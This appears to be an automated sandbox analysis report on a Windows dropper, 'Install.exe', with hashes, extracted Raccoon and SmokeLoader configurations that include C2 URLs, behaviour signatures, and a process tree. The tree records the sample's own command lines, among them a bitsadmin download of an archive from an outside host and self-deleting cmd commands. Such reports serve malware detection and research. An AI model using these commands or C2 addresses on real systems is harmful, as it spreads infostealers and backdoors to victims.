Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1800s
  • max time network
    1760s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 06:39

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 36 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1456
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2672
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2404
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2364
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1896
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1272
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1264
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:948
                    • C:\Users\Admin\AppData\Roaming\jeebvsg
                      C:\Users\Admin\AppData\Roaming\jeebvsg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3624
                    • C:\Users\Admin\AppData\Roaming\ebebvsg
                      C:\Users\Admin\AppData\Roaming\ebebvsg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5604
                      • C:\Users\Admin\AppData\Roaming\ebebvsg
                        C:\Users\Admin\AppData\Roaming\ebebvsg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4288
                    • C:\Users\Admin\AppData\Roaming\jeebvsg
                      C:\Users\Admin\AppData\Roaming\jeebvsg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5420
                    • C:\Users\Admin\AppData\Roaming\ebebvsg
                      C:\Users\Admin\AppData\Roaming\ebebvsg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3980
                      • C:\Users\Admin\AppData\Roaming\ebebvsg
                        C:\Users\Admin\AppData\Roaming\ebebvsg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4872
                    • C:\Users\Admin\AppData\Roaming\jeebvsg
                      C:\Users\Admin\AppData\Roaming\jeebvsg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:5860
                    • C:\Users\Admin\AppData\Roaming\ebebvsg
                      C:\Users\Admin\AppData\Roaming\ebebvsg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5352
                      • C:\Users\Admin\AppData\Roaming\ebebvsg
                        C:\Users\Admin\AppData\Roaming\ebebvsg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:5872
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll",EaIFXnVstsO
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:4932
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1000
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3744
                      • C:\Users\Admin\AppData\Local\Temp\is-H7R41.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-H7R41.tmp\Install.tmp" /SL5="$40050,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4024
                        • C:\Users\Admin\AppData\Local\Temp\is-GE7K9.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-GE7K9.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2732
                          • C:\Program Files\Windows Defender\QVZQWLQYVH\ultramediaburner.exe
                            "C:\Program Files\Windows Defender\QVZQWLQYVH\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2108
                            • C:\Users\Admin\AppData\Local\Temp\is-88PB6.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-88PB6.tmp\ultramediaburner.tmp" /SL5="$6002E,281924,62464,C:\Program Files\Windows Defender\QVZQWLQYVH\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:3844
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:4032
                          • C:\Users\Admin\AppData\Local\Temp\33-0b84b-4f7-4b6a4-67c46433eb35f\Wyzhushoryho.exe
                            "C:\Users\Admin\AppData\Local\Temp\33-0b84b-4f7-4b6a4-67c46433eb35f\Wyzhushoryho.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1800
                          • C:\Users\Admin\AppData\Local\Temp\64-0b656-344-b8f9f-c43a4fd1d1d85\Torovubaeqae.exe
                            "C:\Users\Admin\AppData\Local\Temp\64-0b656-344-b8f9f-c43a4fd1d1d85\Torovubaeqae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4080
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jqa2r0o.u5c\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4480
                              • C:\Users\Admin\AppData\Local\Temp\5jqa2r0o.u5c\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\5jqa2r0o.u5c\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4724
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmhyy2e2.rnm\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5868
                              • C:\Users\Admin\AppData\Local\Temp\jmhyy2e2.rnm\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\jmhyy2e2.rnm\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5964
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t5rdjxgm.brs\google-game.exe & exit
                              5⤵
                                PID:5896
                                • C:\Users\Admin\AppData\Local\Temp\t5rdjxgm.brs\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\t5rdjxgm.brs\google-game.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:5012
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                      PID:5668
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4fuza3s.fgt\y1.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5896
                                  • C:\Users\Admin\AppData\Local\Temp\k4fuza3s.fgt\y1.exe
                                    C:\Users\Admin\AppData\Local\Temp\k4fuza3s.fgt\y1.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:5992
                                    • C:\Users\Admin\AppData\Local\Temp\maEnibqppS.exe
                                      "C:\Users\Admin\AppData\Local\Temp\maEnibqppS.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:5756
                                      • C:\Users\Admin\AppData\Roaming\1619246254756.exe
                                        "C:\Users\Admin\AppData\Roaming\1619246254756.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619246254756.txt"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5724
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\maEnibqppS.exe"
                                        8⤵
                                          PID:5860
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:5888
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.1 -n 3
                                            9⤵
                                            • Runs ping.exe
                                            PID:5276
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\k4fuza3s.fgt\y1.exe"
                                        7⤵
                                          PID:5260
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            8⤵
                                            • Delays execution with timeout.exe
                                            PID:5984
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\35ef0yl1.hgy\inst.exe & exit
                                      5⤵
                                        PID:5900
                                        • C:\Users\Admin\AppData\Local\Temp\35ef0yl1.hgy\inst.exe
                                          C:\Users\Admin\AppData\Local\Temp\35ef0yl1.hgy\inst.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5148
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0psvm4ug.n0a\SunLabsPlayer.exe /S & exit
                                        5⤵
                                          PID:3832
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            6⤵
                                            • Loads dropped DLL
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:5668
                                          • C:\Users\Admin\AppData\Local\Temp\0psvm4ug.n0a\SunLabsPlayer.exe
                                            C:\Users\Admin\AppData\Local\Temp\0psvm4ug.n0a\SunLabsPlayer.exe /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:5680
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5604
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4744
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5604
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5588
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5984
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5864
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:5380
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          7⤵
                                                          • Download via BitsAdmin
                                                          PID:5020
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4604
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:6084
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:2880
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5280
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5828
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5844
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5852
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:4748
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      PID:3936
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5280
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:4880
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        8⤵
                                                                          PID:4744
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:2212
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5376
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA521.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:1512
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5880
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytis24cd.jca\GcleanerWW.exe /mixone & exit
                                                                          5⤵
                                                                            PID:5772
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qaskhlyk.zsz\toolspab1.exe & exit
                                                                            5⤵
                                                                              PID:4448
                                                                              • C:\Users\Admin\AppData\Local\Temp\qaskhlyk.zsz\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\qaskhlyk.zsz\toolspab1.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5536
                                                                                • C:\Users\Admin\AppData\Local\Temp\qaskhlyk.zsz\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\qaskhlyk.zsz\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5152
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ateec4nt.aa5\c7ae36fa.exe & exit
                                                                              5⤵
                                                                                PID:1940
                                                                                • C:\Users\Admin\AppData\Local\Temp\ateec4nt.aa5\c7ae36fa.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\ateec4nt.aa5\c7ae36fa.exe
                                                                                  6⤵
                                                                                    PID:5888
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eebsgjfm.42x\app.exe /8-2222 & exit
                                                                                  5⤵
                                                                                    PID:4684
                                                                                    • C:\Users\Admin\AppData\Local\Temp\eebsgjfm.42x\app.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\eebsgjfm.42x\app.exe /8-2222
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5180
                                                                                      • C:\Users\Admin\AppData\Local\Temp\eebsgjfm.42x\app.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\eebsgjfm.42x\app.exe" /8-2222
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:5780
                                                                          • \??\c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                            1⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:8
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • Checks processor information in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              PID:5628
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4172
                                                                          • C:\Windows\system32\browser_broker.exe
                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            PID:4228
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:4848
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5052
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:4720
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5396
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5920
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:5812
                                                                            • C:\Users\Admin\AppData\Local\Temp\7E97.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7E97.exe
